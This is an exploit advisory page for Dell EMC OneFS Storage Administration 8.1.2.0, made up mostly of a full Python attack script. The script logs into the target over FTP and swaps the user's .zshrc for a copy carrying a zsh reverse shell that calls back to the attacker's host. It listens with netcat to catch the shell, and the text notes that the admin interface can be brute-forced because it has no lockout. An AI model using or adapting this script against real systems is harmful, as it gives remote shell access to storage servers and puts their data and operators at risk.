DELL EMC OneFS Storage Administration 8.1.2.0 .zshrc Overwrite

2018.10.11
Credit: wetw0rk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python # # Exploit name : isilon-onefs-brute.py # Created date : 9/21/18 # Submit Date : 10/10/18 # Author : wetw0rk # Python version : 2.7 # Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py # Vendor Homepage : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm # Software Link : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip # Tested on : DELL EMC OneFS Storage Administration 8.1.2.0 # # Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil # # [------------ Timeline ------------] # 9/21/18 - Contacted Dell PSIRT # 9/25/18 - Sent POC code # 10/9/18 - Responded with "not considered a vulnerability" # # Description : # To exploit this vulnerability first you must gain access to the administrative # interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable # FTP like so: # -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit! # # Since you're dropped in the user home directory and not a secluded FTP directory # you can inject into .zshrc, however as dell stated you can access other files on # the system as well.... # import os import sys import socket import threading RED = "\033[1m\033[31m[-]\033[0m" BLUE = "\033[1m\033[94m[*]\033[0m" GREEN = "\033[1m\033[92m[+]\033[0m" def background_server(lhost): global check fd = open(".zshrc", 'w') host = "0.0.0.0" port = 50121 sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) sock.bind((host, port)) sock.listen(5) print("%s listening on %s:%s" % (BLUE, host,port)) while True: conn, addr = sock.accept() if check != 1: zshrc_file = conn.recv(4096) print("%s generating .zshrc payload" % BLUE) fd.write(zshrc_file) # msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost) fd.close() else: with open('.zshrc', 'r') as myfile: data=myfile.read() conn.send(data) try: rhost = sys.argv[1] rport = int(sys.argv[2]) lhost = sys.argv[3] username = sys.argv[4] password = sys.argv[5] except: print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0]) print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0]) exit(0) check = 0 # start a background server for download+uploads server_thread = threading.Thread(target=background_server, args=(lhost,)) server_thread.start() # create a socket for the client sending the commands print("%s connecting to %s:%s" % (BLUE, rhost, rport)) csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) csock.connect((rhost, rport)) csock.recv(4096) print("%s performing login to OneFS using %s:%s" % (BLUE, username, password)) csock.send("USER %s\r\n" % username) csock.recv(4096) csock.send("PASS %s\r\n" % password) csock.recv(4096) print("%s login was successful downloading .zshrc" % GREEN) csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121 csock.recv(4096) csock.send("RETR .zshrc\r\n") csock.recv(4096) csock.send("RNFR .zshrc\r\n") csock.recv(4096) print("%s renaming remote .zshrc to .backup" % GREEN) csock.send("RNTO .backup\r\n") csock.recv(4096) check = 1 print("%s uploading payload to target host" % GREEN) csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121 csock.recv(4096) csock.send("TYPE I\r\n") csock.recv(4096) csock.send("STOR .zshrc\r\n") print("%s exploitation complete waiting for %s to login" % (GREEN, username)) os.system("nc -lvp 443") csock.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top